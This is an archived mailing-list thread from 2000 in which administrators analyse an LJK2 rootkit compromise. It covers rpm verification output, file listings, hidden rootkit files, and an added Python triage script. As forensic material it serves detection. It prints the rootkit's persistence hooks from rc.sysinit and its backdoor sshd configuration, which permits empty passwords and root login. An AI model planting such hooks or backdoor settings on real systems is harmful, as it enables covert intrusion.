Security Incidents mailing list archives

Re: LJK2 rootkit?


From: egon.barfuss () SNB AT (Egon Barfuß jun.)
Date: Wed, 17 May 2000 11:25:11 +0200


Hi!

A few weeks ago we had the same rootkit installed on a server of one of our customers. You
should check your mail logfiles, because the intruder sends himself a mail with some system
data of your server. At that time he used a hotmail account "lawkxxx () hotmail com". After
contacting hotmail to help us catch this intruder by sending us parts of their logfiles, where
we could get the IP addresses he usually used, nothing came back. Some mails later hotmail
deactivated the account but did nothing more to help us. Because the mail to himself never
reached him (sendmail was not running on this machine), he tried to come back, but at this
point the rootkit was deleted and the server more secured than before, so I could catch his
IP address...

Egon

Felix Schueren wrote:

A webserver's DNS service stopped working "overnight", and when I checked it
out first thing in the morning, trying to run "top" dumped me to a somewhat
broken (no visible chars at all) shell. Curious, I checked the procps RPM
checksum from a CD vs. the installed one, and it turned out to be different.
I then checked all the RPMs vs the original versions from CD:

S.5..UG.   /bin/ls
S.5..UG.   /usr/bin/locate
S.5....T c /etc/rc.d/rc.sysinit
S.5..UG.   /sbin/syslogd
S.5..UG.   /bin/netstat
S.5..UG.   /sbin/ifconfig
S.5..UG.   /bin/ps
SM5..UG.   /usr/bin/top
SM5..UG.   /usr/bin/pstree
SM5..UG.   /bin/login
.M......   /usr/bin/makemap

/* failure codes:
5 - MD5 sum
S - File size
L - Symlink
T - Mtime
D - Device
U - User
G - Group
M - Mode (includes permissions and file type)
*/

The user/group that all of those files had was 532/532. A search for all
files owned by UID 532 revealed:
++++++++++++++++++++++++++++++++++++++
55185  134 -rwxr-xr-x   1 532      532        136491 Aug  6  1998 /bin/ls
55186   30 -rwxr-xr-x   1 532      532         30628 Sep  3  1998 /bin/netstat
55187   37 -r-xr-xr-x   1 532      532         36959 Oct  3  1998 /bin/ps
55199   25 -r-sr-xr-x   1 532      532         24772 Oct 14  1998 /bin/login
55183   20 -rwxr-xr-x   1 532      532         19700 Sep  3  1998 /sbin/ifconfig
55201  255 -rwxr-xr-x   1 532      532        260476 Nov 16  1999 /sbin/syslogd
55182   28 -rwxr-xr-x   1 532      532         27751 Jul 29  1998 /usr/bin/locate
55203   56 -rwxr-xr-x   1 532      532         56794 Oct  3  1998 /usr/bin/top
55188   32 -rwxr-xr-x   1 532      532         32177 Sep 11  1998 /usr/bin/pstree
55178    1 -rw-r--r--   1 532      532           131 May 14 21:07 /usr/lib/libmen.oo/.LJK2/hide/.RK1addr
55180    1 -rw-r--r--   1 532      532            77 May 14 20:47 /usr/lib/libmen.oo/.LJK2/hide/.RK1log
55179    1 -rw-r--r--   1 532      532            76 Apr 12 13:57 /usr/lib/libmen.oo/.LJK2/hide/.RK1dir
55181    1 -rw-r--r--   1 532      532            44 May 14 21:07 /usr/lib/libmen.oo/.LJK2/hide/.RK1proc
55194    5 -rwxr-xr-x   1 532      532          4098 Sep 12  1999 /usr/lib/libmen.oo/.LJK2/hide/RK1phidemod.c
55191    4 -rwxr-xr-x   1 532      532          3407 Feb 15 20:08 /usr/lib/libmen.oo/.LJK2/modules/RK1hidem.c
55193   25 -rwxr-xr-x   1 532      532         24860 Mar  3 20:22 /usr/lib/libmen.oo/.LJK2/modules/RK1phide
55195    2 -rwxr-xr-x   1 532      532          1345 Sep  9  1999 /usr/lib/libmen.oo/.LJK2/clean/RK1sauber
55200    8 -rwxr-xr-x   1 532      532          7538 Mar  6 00:02 /usr/lib/libmen.oo/.LJK2/clean/RK1wted
55196   10 -rwxr-xr-x   1 532      532          9361 Sep  9  1999 /usr/lib/libmen.oo/.LJK2/hack/RK1sniff
55192    7 -rwxr-xr-x   1 532      532          6232 Sep  9  1999 /usr/lib/libmen.oo/.LJK2/hack/RK1parse
136797  568 -rwxr-xr-x   1 532      532        580696 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/sshconfig/RK1ssh
55173    1 -rw-r--r--   1 532      532           880 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/ssh_config
55174    1 -rw-r--r--   1 532      532           542 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/ssh_host_key
55175    1 -rw-r--r--   1 532      532           329 Mar  6 00:34 /usr/lib/libmen.oo/.LJK2/ssh_host_key.pub
55176    1 -rwxr-xr-x   1 532      532           512 May 15 13:46 /usr/lib/libmen.oo/.LJK2/ssh_random_seed
55177    1 -rw-r--r--   1 532      532           723 Feb 18 23:24 /usr/lib/libmen.oo/.LJK2/sshd_config
144926   26 -rwxr-xr-x   1 532      532         26352 Mar  3 20:06 /usr/sbin/rhxclean
55198  600 -rwxr-xr-x   1 532      532        613543 Feb 18 23:24 /usr/sbin/rpmrhup
++++++++++++++++++++++++++++++++++++++

When I checked the rc.sysinit file, the following two suspicious entries
were to be found at the very end of the file:
+++++++++++++++
# There is a RPM database which,
# needs to be updated.
if [ -x /usr/sbin/rpmrhup ]; then
/usr/sbin/rpmrhup -p 60569
fi

# Since there are lost procs,
# we must clean them up.
if [ -x /usr/sbin/rhxclean ]; then
/usr/sbin/rhxclean
fi
+++++++++++++++
Noteworthy: the bad English. The misplaced comma is a "common" European
error; it would fit in nicely with the notes further down.

Here's the complete listing of the .LJK2 directory structure (this is out of
a backup tar, the UIDs are broken by now):
+++++++++++++++++++++++
[machine]# ls -la *
-rw-r--r--   1 root     root          880 Feb 18 21:24 ssh_config
-rw-r--r--   1 root     root          542 Feb 18 21:24 ssh_host_key
-rw-r--r--   1 root     root          329 Mar  5 22:34 ssh_host_key.pub
-rwxr-xr-x   1 root     root          512 May 15 10:46 ssh_random_seed*
-rw-r--r--   1 root     root          723 Feb 18 21:24 sshd_config

backdoor:
total 29
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root        26352 May 14 17:47 RK1bd*

backup:
total 250
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root        12972 Aug  6  1998 du*
-rwxr-xr-x   1 root     root        25596 Sep  2  1998 ifconfig*
-rw-r--r--   1 root     root         3442 May 14 17:46 inetd.conf
-rwxr-xr-x   1 root     root         7560 Jul 29  1998 locate*
-rws--x--x   1 root     root        15284 Oct 14  1998 login*
-rwxr-xr-x   1 root     root        29308 Aug  6  1998 ls*
-rwxr-xr-x   1 root     root        39168 Sep  2  1998 netstat*
-r-xr-xr-x   1 root     root        12708 Oct  3  1998 ps*
-r-xr-xr-x   1 root     root        10176 Sep 11  1998 pstree*
-rwxr-xr-x   1 root     root         7165 Oct 15  1998 rc.sysinit*
-rwxr-xr-x   1 root     root        24988 Nov 16  1999 syslogd*
-rwxr-xr-x   1 root     root        19640 Aug 22  1998 tcpd*
-r-xr-xr-x   1 root     root        30772 Oct  3  1998 top*
clean:
total 12
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root         1345 Sep  9  1999 RK1sauber*
-rwxr-xr-x   1 root     root         7538 Mar  5 22:02 RK1wted*

hack:
total 19
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root         6232 Sep  9  1999 RK1parse*
-rwxr-xr-x   1 root     root         9361 Sep  9  1999 RK1sniff*

hide:
total 11
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rw-r--r--   1 root     root          131 May 14 18:07 .RK1addr
-rw-r--r--   1 root     root           76 Apr 12 10:57 .RK1dir
-rw-r--r--   1 root     root           77 May 14 17:47 .RK1log
-rw-r--r--   1 root     root           44 May 14 18:07 .RK1proc
-rwxr-xr-x   1 root     root         4098 Sep 12  1999 RK1phidemod.c*

modules:
total 33
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root          336 Apr 12 11:02 README.modules*
-rwxr-xr-x   1 root     root         3407 Feb 15 18:08 RK1hidem.c*
-rwxr-xr-x   1 root     root        24860 Mar  3 18:22 RK1phide*

sshconfig:
total 574
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root       580696 Feb 18 21:24 RK1ssh*
+++++++++++++++++++++++
Worth pointing out: ./clean/RK1sauber could very well be a hint on the
nationality of the attacker, or the point of origin of the package: "sauber"
is German for "clean".
Also: the backup of inetd.conf is the original version w/o telnet; the /etc/inetd.conf
had telnet services enabled after the package ran.

A few files of interest:
[root@machine]# cat .LJK2/hide/.RK1addr
1 212.204
1 62.236
2 212.204
2 62.236
3 76335
4 76335
4 6667
4 5556
4 6666
4 6664
4 6668
3 60569
4 60569
2 213.48
2 210.225
3 4103

next file:
[root@machine]# cat .LJK2/hide/.RK1log
RK1
.LJK2
synscan
76335
212.204
195.114
62.236
204.29
rpmrhup
rhxclean
60569

next:
[root@machine]# cat .LJK2/hide/.RK1dir
libmen.oo
.LJK2
rc.sysinit
lockit25.tgz
lockit25.tar
lockit25.tar.gz
lockit

and:
[root@machine]# less .LJK2/hide/.RK1proc
2 synscan
3 RK1
2 rpmrhup
2 rhxclean
3 sshd

./LJK2/ssh_host_key contains the string "root () www bigwigauctions com"
./LJK2/ssh_host_key.pub contains the string "root@LJK2"
./LJK2/sshd_config is a standard SSHd config file, contents:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# This is ssh server systemwide configuration file.

Port 22
ListenAddress 0.0.0.0
HostKey /usr/lib/libmen.oo/.LJK2/ssh_host_key
RandomSeed /usr/lib/libmen.oo/.LJK2/ssh_random_seed
ServerKeyBits 768
LoginGraceTime 600
KeyRegenerationInterval 3600
PermitRootLogin yes
IgnoreRhosts no
StrictModes yes
QuietMode no
X11Forwarding yes
X11DisplayOffset 10
FascistLogging no
PrintMotd yes
KeepAlive yes
SyslogFacility DAEMON
RhostsAuthentication no
RhostsRSAAuthentication yes
RSAAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords yes
UseLogin no
# CheckMail no
# PidFile /u/zappa/.ssh/pid
# AllowHosts *.our.com friend.other.com
# DenyHosts lowsecurity.theirs.com *.evil.org evil.org
# Umask 022
# SilentDeny yes
+++++++++++++++++++++++++++++++++++++++++++

This looks similar to (but not exactly like) the CERT Advisory
described in the summary http://www.cert.org/summaries/CS-98.04.html

The version of BIND running was bind-8.1.2-5 (yeah...I know...), and I got a
couple of "lame server on..." messages and lots of named restarts around the
time I place the intrusion.

Any ideas on whether or not it would be possible to retrieve the point of
origin of the attack? Also, was this a known package? I haven't been able to
find anything about "LJK2".

Oh, and while the machine itself has been restored, I have a full backup
available, so if you have any further questions about files etc I'll be glad
to dig them out.

regards,

felix
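
The triage Felix did by hand on the rpm -V output above, as an added Python example that is not part of either poster's message: it parses the eight-column failure codes and separates replaced binaries (content and ownership changed) from edited config files such as rc.sysinit. The sample lines are copied from the post; the column order SM5DLUGT is that of rpm 3.x, which the post's legend matches.

```python
import re

# Constructed sample input: four of the rpm -V lines quoted in the post.
SAMPLE_RPM_V = """\
S.5..UG.   /bin/ls
S.5....T c /etc/rc.d/rc.sysinit
SM5..UG.   /bin/login
.M......   /usr/bin/makemap
"""

# rpm 3.x prints eight test columns in this fixed order; '.' means the test passed.
FLAG_NAMES = {"S": "size", "M": "mode", "5": "md5", "D": "device",
              "L": "symlink", "U": "user", "G": "group", "T": "mtime"}
# flags, optional file attribute (c = config, d = doc, ...), then the path
LINE_RE = re.compile(r"^([SM5DLUGT.]{8})\s+(?:([cdglr])\s+)?(\S+)$")


def parse_rpm_verify(text):
    """Return a list of (path, set of failed tests, is_config_file)."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:
            continue  # 'missing' notices, dependency warnings, blank lines
        flags, attr, path = m.groups()
        failed = {FLAG_NAMES[c] for c in flags if c != "."}
        entries.append((path, failed, attr == "c"))
    return entries


def triage(entries):
    """Classify each failure the way the post's reasoning does."""
    verdicts = {}
    for path, failed, is_config in entries:
        content_changed = failed & {"md5", "size"}
        owner_changed = failed & {"user", "group"}
        if content_changed and not is_config:
            # A packaged binary with different contents: a trojaned replacement.
            verdicts[path] = "replaced-binary" + ("+owner" if owner_changed else "")
        elif is_config and failed <= {"mtime", "md5", "size"}:
            # Config edits are normal, but diff them against a known-good copy:
            # here rc.sysinit carried the rpmrhup/rhxclean start-up hooks.
            verdicts[path] = "config-edited"
        else:
            verdicts[path] = "review"  # e.g. mode-only change on makemap
    return verdicts


if __name__ == "__main__":
    for path, verdict in triage(parse_rpm_verify(SAMPLE_RPM_V)).items():
        print(f"{verdict:24} {path}")
```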

